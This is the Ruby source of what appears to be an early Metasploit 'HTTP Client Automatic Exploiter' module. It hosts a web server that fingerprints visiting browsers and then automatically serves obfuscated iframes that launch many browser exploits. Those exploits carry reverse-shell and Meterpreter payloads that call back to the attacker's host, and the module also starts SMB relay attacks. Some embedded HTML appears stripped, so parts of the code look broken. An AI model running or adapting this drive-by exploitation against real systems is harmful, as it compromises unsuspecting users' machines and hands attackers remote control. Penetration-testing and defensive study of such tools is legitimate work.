## # $Id:$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ ## require 'msf/core' require 'rex/exploitation/javascriptosdetect.rb' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report def initialize(info = {}) super(update_info(info, 'Name' => 'HTTP Client Automatic Exploiter', 'Version' => '$Revision: $', 'Description' => %q{ This module uses a combination of client-side and server-side techniques to fingerprint HTTP clients and then automatically exploit them. }, 'Author' => [ 'egypt ', # initial concept, integration and extension of Jerome's os_detect.js 'Jerome Athias' # advanced Windows OS detection in javascript ], 'License' => BSD_LICENSE, 'Actions' => [ [ 'WebServer' ] ], 'PassiveActions' => [ 'WebServer' ], 'DefaultAction' => 'WebServer')) register_options([ OptAddress.new('LHOST', [true, 'The IP address to use for reverse-connect payloads']), OptPort.new('LPORT', [false, 'The starting TCP port number for reverse-connect payloads', 4444]) ], self.class) @exploits = Hash.new end def init_exploit(name, targ = 0) targ ||= 0 case name when %r{exploit/windows} payload='windows/meterpreter/reverse_tcp' else payload='generic/shell_reverse_tcp' end @exploits[name] = framework.modules.create(name) @exploits[name].datastore['SRVPORT'] = datastore['SRVPORT'] # For testing, set the exploit uri to the name of the exploit so it's # easy to tell what is happening from the browser. # XXX: Comment this out for release @exploits[name].datastore['URIPATH'] = name @exploits[name].datastore['LPORT'] = @lport @exploits[name].datastore['LHOST'] = @lhost @exploits[name].exploit_simple( 'LocalInput' => self.user_input, 'LocalOutput' => self.user_output, 'Target' => targ, 'Payload' => payload, 'RunAsJob' => true) @lport += 1 end def setup() super @lport = datastore['LPORT'] || 4444 @lhost = datastore['LHOST'] @lport = @lport.to_i print_status("Starting exploit modules on host #{@lhost}...") ## # Start all the exploit modules ## # TODO: add an Automatic target to all of the Firefox exploits # Firefox < 1.0.5 # requires javascript init_exploit('exploit/multi/browser/mozilla_compareto') # Firefox < # requires java # requires javascript init_exploit('exploit/multi/browser/mozilla_navigatorjava') # Firefox < # For now just use the default target of Mac. # requires javascript init_exploit('exploit/multi/browser/firefox_queryinterface') # works on iPhone # does not require javascript init_exploit('exploit/osx/armle/safari_libtiff') # untested #init_exploit('exploit/osx/browser/software_update') # untested #init_exploit('exploit/windows/browser/ani_loadimage_chunksize') # does not require javascript init_exploit('exploit/windows/browser/apple_quicktime_rtsp') # requires javascript init_exploit('exploit/windows/browser/novelliprint_getdriversettings') # Works on default IE 6 # Doesn't work on Windows 2000 SP0 IE 5.0 # I'm pretty sure keyframe works on everything this works on, but since # this doesn't need javascript, try it anyway. # does not require javascript init_exploit('exploit/windows/browser/ms03_020_ie_objecttype') # requires javascript init_exploit('exploit/windows/browser/ie_createobject') # I'm pretty sure keyframe works on everything this works on and more, # so for now leave it out. # requires javascript #init_exploit('exploit/windows/browser/ms06_055_vml_method') # Works on default IE 5 and 6 # requires javascript # ActiveXObject('DirectAnimation.PathControl') # classid D7A7D7C3-D47F-11D0-89D3-00A0C90833E6 init_exploit('exploit/windows/browser/ms06_067_keyframe') # only works on IE with XML Core Services # requires javascript # classid 88d969c5-f192-11d4-a65f-0040963251e5 init_exploit('exploit/windows/browser/ms06_071_xml_core') # Pops up whatever client is registered for .pls files. It's pretty # obvious to the user when this exploit loads, so leave it out for now. # does not require javascript #init_exploit('exploit/windows/browser/winamp_playlist_unc') # # Requires UNC path which only seems to work on IE in my tests # # Launch a smb_relay module on port 139 smbr_mod = framework.modules.create('exploit/windows/smb/smb_relay') smbr_mod.datastore['LHOST'] = @lhost smbr_mod.datastore['LPORT'] = (@lport += 1) smbr_mod.datastore['SRVPORT'] = 139 smbr_mod.datastore['AutoRunScript'] = 'migrate' smbr_mod.exploit_simple( 'LocalInput' => self.user_input, 'LocalOutput' => self.user_output, 'Target' => 0, 'Payload' => 'windows/meterpreter/reverse_tcp', 'RunAsJob' => true) # Launch a second one with port 445 smbr_mod = framework.modules.create('exploit/windows/smb/smb_relay') smbr_mod.datastore['LHOST'] = @lhost smbr_mod.datastore['LPORT'] = (@lport += 1) smbr_mod.datastore['SRVPORT'] = 445 smbr_mod.datastore['AutoRunScript'] = 'migrate' smbr_mod.exploit_simple( 'LocalInput' => self.user_input, 'LocalOutput' => self.user_output, 'Target' => 0, 'Payload' => 'windows/meterpreter/reverse_tcp', 'RunAsJob' => true) @myhost = datastore['SRVHOST'] @myport = datastore['SRVPORT'] end def on_request_uri(cli, request) print_status("Request '#{request.uri}' from #{cli.peerhost}:#{cli.peerport}") # Create a cached mapping between IP and detected target @targetcache ||= {} @targetcache[cli.peerhost] ||= {} @targetcache[cli.peerhost][:update] = Time.now.to_i ## # Clean the cache -- remove hosts that we haven't seen for more than 60 # seconds ## rmq = [] @targetcache.each_key do |addr| if (Time.now.to_i > @targetcache[addr][:update]+60) rmq.push addr end end rmq.each {|addr| @targetcache.delete(addr) } #-- case request.uri when %r{^#{datastore['URIPATH']}.*sessid=} record_detection(cli, request) send_not_found(cli) when self.get_resource # # This is the request for exploits. At this point all we know # about the target came from the useragent string which could # have been spoofed, so let the javascript figure out which # exploits to run. Record detection based on the useragent in # case javascript is disabled on the target. # record_detection(cli, request) print_status("Responding with exploits") response = build_sploit_response(cli, request) response['Expires'] = '0' response['Cache-Control'] = 'must-revalidate' cli.send_response(response) else print_error("I don't know how to handle this request (#{request.uri}), sending 404") send_not_found(cli) return false end end def run exploit() end def build_sploit_response(cli, request) if (!@targetcache[cli.peerhost]) record_detection(cli, request) end response = create_response() # TODO: instead of writing all of the iframes at once, # consider having a javascript timeout function that writes # each exploit's iframe so they don't step on each other. # I'm not sure this is really an issue since IE seems to # just load the next iframe when the first didn't crash it. objects = { 'DirectAnimation.PathControl' => @exploits['exploit/windows/browser/ms06_067_keyframe'].get_resource, '{88d969c5-f192-11d4-a65f-0040963251e5}' => @exploits['exploit/windows/browser/ms06_071_xml_core'].get_resource, '{36723F97-7AA0-11D4-8919-FF2D71D0D32C}' => @exploits['exploit/windows/browser/novelliprint_getdriversettings'].get_resource, '{BD96C556-65A3-11D0-983A-00C04FC29E36}' => @exploits['exploit/windows/browser/ie_createobject'].get_resource, '{BD96C556-65A3-11D0-983A-00C04FC29E30}' => @exploits['exploit/windows/browser/ie_createobject'].get_resource, '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}' => @exploits['exploit/windows/browser/ie_createobject'].get_resource, '{6414512B-B978-451D-A0D8-FCFDF33E833C}' => @exploits['exploit/windows/browser/ie_createobject'].get_resource, '{06723E09-F4C2-43c8-8358-09FCD1DB0766}' => @exploits['exploit/windows/browser/ie_createobject'].get_resource, '{639F725F-1B2D-4831-A9FD-874847682010}' => @exploits['exploit/windows/browser/ie_createobject'].get_resource, '{BA018599-1DB3-44f9-83B4-461454C84BF8}' => @exploits['exploit/windows/browser/ie_createobject'].get_resource, '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}' => @exploits['exploit/windows/browser/ie_createobject'].get_resource, '{E8CCCDDF-CA28-496b-B050-6C07C962476B}' => @exploits['exploit/windows/browser/ie_createobject'].get_resource, '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}' => @exploits['exploit/windows/browser/ie_createobject'].get_resource, '{0006F033-0000-0000-C000-000000000046}' => @exploits['exploit/windows/browser/ie_createobject'].get_resource, '{0006F03A-0000-0000-C000-000000000046}' => @exploits['exploit/windows/browser/ie_createobject'].get_resource, } hash_declaration = objects.map{ |k, v| "'#{k}', '#{v}'," }.join.chop js = <<-ENDJS #{js_os_detect} #{js_base64} // Hash implementation stolen from http://www.mojavelinux.com/articles/javascript_hashes.html function Hash() { this.length = 0; this.items = new Array(); for (var current_item = 0; current_item < arguments.length; current_item += 2) { if (typeof(arguments[current_item + 1]) != 'undefined') { this.items[arguments[current_item]] = arguments[current_item + 1]; this.length++; } } } function send_detection_report(detected_version) { // ten chars long and all uppercase so we can't possibly step // on a real version string. var cruft = "#{Rex::Text.rand_text_alpha_upper(10)}"; var encoded_detection; try { xmlhr = new XMLHttpRequest(); } catch(e) { try { xmlhr = new ActiveXObject("Microsoft.XMLHTTP"); } catch(e) { xmlhr = new ActiveXObject("MSXML2.ServerXMLHTTP"); } } if (! xmlhr) { return(0); } encoded_detection = new String(); encoded_detection += detected_version.os_name + cruft; encoded_detection += detected_version.os_flavor + cruft; encoded_detection += detected_version.os_sp + cruft; encoded_detection += detected_version.os_lang + cruft; encoded_detection += detected_version.arch + cruft; encoded_detection += detected_version.browser_name + cruft; encoded_detection += detected_version.browser_version; while (-1 != encoded_detection.indexOf(cruft)) { encoded_detection = encoded_detection.replace(cruft, ":"); } document.write(encoded_detection + "
"); encoded_detection = Base64.encode(encoded_detection); document.write(encoded_detection + "
"); xmlhr.open("GET", document.location + "?sessid=" + encoded_detection, false); xmlhr.send(null); } function BodyOnLoad() { var sploit_frame = ''; var body_elem = document.getElementById('body_id'); var detected_version = getVersion(); try { // This function doesn't seem to get created on old // browsers (specifically, Firefox 1.0), so until I // can puzzle out why, wrap it in a try block so the // javascript parser doesn't crap out and die before // any exploits get sent. send_detection_report(detected_version); } catch (e) {} if ("#{HttpClients::IE}" == detected_version.browser_name) { //document.write("This is IE
"); // object_list contains key-value pairs like // {classid} => /srvpath/to/exploit/for/classid // and // ActiveXname => /srvpath/to/exploit/for/ActiveXname var object_list = new Hash(#{hash_declaration}); var vuln_obj; var written_frames = new Array(); // iterate through our list of exploits //document.write("I have " + object_list.length + " objects to test
"); for (var current_item in object_list.items) { //document.write("Testing for object " + current_item + " ... "); // Don't write the same iframe more than once. This is // only an issue with ie_createobject which uses a ton of // different classids to perform the same exploit. // Assumes that no url will be a substring of another url. if (-1 != written_frames.toString().indexOf(object_list.items[current_item])) { //document.write("Already wrote an iframe for " + object_list.items[current_item] +"
"); continue; } vuln_obj = ''; if (current_item.substring(0,1) == '{') { //document.write("which is a clasid
"); // classids are stored surrounded in braces for an easy way to tell // them from ActiveX object names, so if it has braces, strip them // out and create an object element with that classid var vuln_obj = document.createElement("object"); vuln_obj.setAttribute("classid", "clsid:" + current_item.substring( 1, current_item.length - 1 ) ) ; } else { //document.write("which is an AXO name
"); // otherwise, try to create an AXO with that name try { vuln_obj = new ActiveXObject(current_item); } catch(e){} } // This doesn't bloody work. vuln_obj is always something // that evaluates to true but there doesn't seem to be any // way of determining if it is actually an ActiveX object. // Since we can't tell if it will work, we end up just sending // all of the iframes; some of them don't work, some of them // do and we get multiple shells. Junior Varsity. if (vuln_obj) { document.write("It exists, making evil iframe
"); sploit_frame += '#{build_iframe("' + object_list.items[current_item] + '")}'; // why the hell is there no array.push() in javascript? written_frames[written_frames.length] = object_list.items[current_item]; } else { //document.write("It does NOT exist, skipping.
"); } } // for each exploit } // if IE else { //document.write("this is NOT MSIE
"); if (window.navigator.javaEnabled && window.navigator.javaEnabled()) { sploit_frame += '#{build_iframe(@exploits['exploit/multi/browser/mozilla_navigatorjava'].get_resource)}'; } if (window.InstallVersion) { sploit_frame += '#{build_iframe(@exploits['exploit/multi/browser/mozilla_compareto'].get_resource)}'; } // eventually this exploit will have an auto target and // this check won't be necessary //if ("#{OperatingSystems::MAC_OSX}" == detected_version.os_name) { if (location.QueryInterface) { sploit_frame += '#{build_iframe(@exploits['exploit/multi/browser/firefox_queryinterface'].get_resource)}'; } //} } if (0 < sploit_frame.length) { //document.write("Conditions optimal, writing evil iframe(s)
"); document.write(sploit_frame); } } // function BodyOnLoad window.onload = BodyOnLoad ENDJS opts = { # Strings obfuscation still needs more testing 'Strings' => true, 'Symbols' => { 'Variables' => [ 'current_item', 'items', 'body_elem', 'body_id', 'object_list', 'vuln_obj', 'obj_elem', 'sploit_frame', 'cruft', 'written_frames', 'detected_version', 'xmlhr', 'encoded_detection' ], 'Methods' => [ 'Hash', 'BodyOnLoad', 'send_detection_report' ] } } js = ::Rex::Exploitation::ObfuscateJS.new(js, opts) js.update_opts(js_os_detect.opts) js.update_opts(js_base64.opts) js.obfuscate() body = "" # # These are non-javascript exploits, send them with all requests in # case the ua is spoofed and js is turned off # body << "" # image for smb_relay share_name = Rex::Text.rand_text_alpha(rand(10) + 5) img_name = Rex::Text.rand_text_alpha(rand(10) + 5) + ".jpg" body << %Q{ } body << build_iframe(@exploits['exploit/windows/browser/apple_quicktime_rtsp'].get_resource) body << build_iframe(@exploits['exploit/osx/armle/safari_libtiff'].get_resource) response.body = ' Loading ' response.body << ' ' + body response.body << " " return response end # consider abstracting this out to a method (probably # with a different name) of Auxiliary::Report or # Exploit::Remote::HttpServer def record_detection(cli, request) os_name = nil os_flavor = nil os_sp = nil os_lang = nil arch = nil ua_name = nil ua_vers = nil data_offset = request.uri.index('sessid=') if (data_offset.nil? or -1 == data_offset) print_status("Recording detection from User-Agent") # then we didn't get a report back from our javascript # detection; make a best guess effort from information # in the user agent string. The OS detection should be # roughly the same as the javascript version because it # does most everything with navigator.userAgent ua = request['User-Agent'] # always check for IE last because everybody tries to # look like IE case (ua) when /Version\/(\d+\.\d+\.\d+).*Safari/ ua_name = HttpClients::SAFARI ua_vers = $1 when /Firefox\/((:?[0-9]+\.)+[0-9]+)/ ua_name = HttpClients::FF ua_vers = $1 when /Mozilla\/[0-9]\.[0-9] \(compatible; MSIE ([0-9]\.[0-9]+)/ ua_name = HttpClients::IE ua_vers = $1 end case (ua) when /Windows/ os_name = OperatingSystems::WINDOWS arch = ARCH_X86 when /Linux/ os_name = OperatingSystems::LINUX when /iPhone/ os_name = OperatingSystems::MAC_OSX arch = 'armle' when /Mac OS X/ os_name = OperatingSystems::MAC_OSX end case (ua) when /Windows 95/ os_flavor = '95' when /Windows 98/ os_flavor = '98' when /Windows NT 4/ os_flavor = 'NT' when /Windows NT 5.0/ os_flavor = '2000' when /Windows NT 5.1/ os_flavor = 'XP' when /Windows NT 5.2/ os_flavor = '2003' when /Windows NT 6.0/ os_flavor = 'Vista' when /Gentoo/ os_flavor = 'Gentoo' when /Debian/ os_flavor = 'Debian' when /Ubuntu/ os_flavor = 'Ubuntu' end case (ua) when /PPC/ arch = ARCH_PPC when /i.86/ arch = ARCH_X86 end print_status("Browser claims to be #{ua_name} #{ua_vers}, running on #{os_name} #{os_flavor}") else print_status("Recording detection from JavaScript") data_offset += 'sessid='.length detected_version = request.uri[data_offset, request.uri.length] if (0 < detected_version.length) detected_version = Rex::Text.decode_base64(Rex::Text.uri_decode(detected_version)) print_status("Report: #{detected_version}") (os_name, os_flavor, os_sp, os_lang, arch, ua_name, ua_vers) = detected_version.split(':') end end arch ||= ARCH_X86 report_host( :host => cli.peerhost, :os_name => os_name, :os_flavor => os_flavor, :os_sp => os_sp, :os_lang => os_lang, :arch => arch, :ua_name => ua_name, :ua_vers => ua_vers ) report_note( :host => cli.peerhost, :type => 'http_request', :data => "#{@myhost}:#{@myport} #{request.method} #{request.resource} #{os_name} #{ua_name} #{ua_vers}" ) end def report_host(opts) @targetcache[opts[:host]][:os_name] = opts[:os_name] @targetcache[opts[:host]][:os_flavor] = opts[:os_flavor] @targetcache[opts[:host]][:os_sp] = opts[:os_sp] @targetcache[opts[:host]][:os_lang] = opts[:os_lang] @targetcache[opts[:host]][:arch] = opts[:arch] @targetcache[opts[:host]][:ua_name] = opts[:ua_name] @targetcache[opts[:host]][:ua_vers] = opts[:ua_vers] super(opts) end # This or something like it should probably be added upstream in Msf::Exploit::Remote def get_target_os(cli) if framework.db.active host = framework.db.get_host(nil, cli.peerhost) res = host.os_name elsif @targetcache[cli.peerhost] and @targetchace[cli.peerhost][:os_name] res = @targetcache[cli.peerhost][:os_name] else res = OperatingSystems::UNKNOWN end return res end # This or something like it should probably be added upstream in Msf::Exploit::Remote def get_target_arch(cli) if framework.db.active host = framework.db.get_host(nil, cli.peerhost) res = host.arch elsif @targetcache[cli.peerhost][:arch] res = @targetcache[cli.peerhost][:arch] else res = ARCH_X86 end return res end def build_iframe(resource) ret = '' ret << "


" ret << "" return ret end end